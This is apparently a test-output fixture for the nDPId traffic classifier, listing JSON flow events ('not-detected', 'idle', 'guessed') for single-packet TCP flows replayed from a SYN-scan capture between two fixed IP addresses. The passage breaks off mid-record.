-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7402,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MySQL","breed":"Acceptable","category":"Database"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1259,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059406,"flow_last_seen":1278275059406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060969,"flow_last_seen":1278275060969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5357,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1681,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060969,"flow_last_seen":1278275060969,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5357,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061071,"flow_last_seen":1278275061071,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5357,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1271,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":697,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1272,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1271,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":750,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1271,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1272,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1272,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060541,"flow_last_seen":1278275060541,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060643,"flow_last_seen":1278275060643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3322,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060643,"flow_last_seen":1278275060643,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3322,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3324,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3323,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3323,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3324,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3325,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1069,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1277,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3325,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3325,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1277,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40193,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":40193,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060559,"flow_last_seen":1278275060559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3333,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060559,"flow_last_seen":1278275060559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1452,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060661,"flow_last_seen":1278275060661,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3333,"l4_proto":"tcp","ndpi": 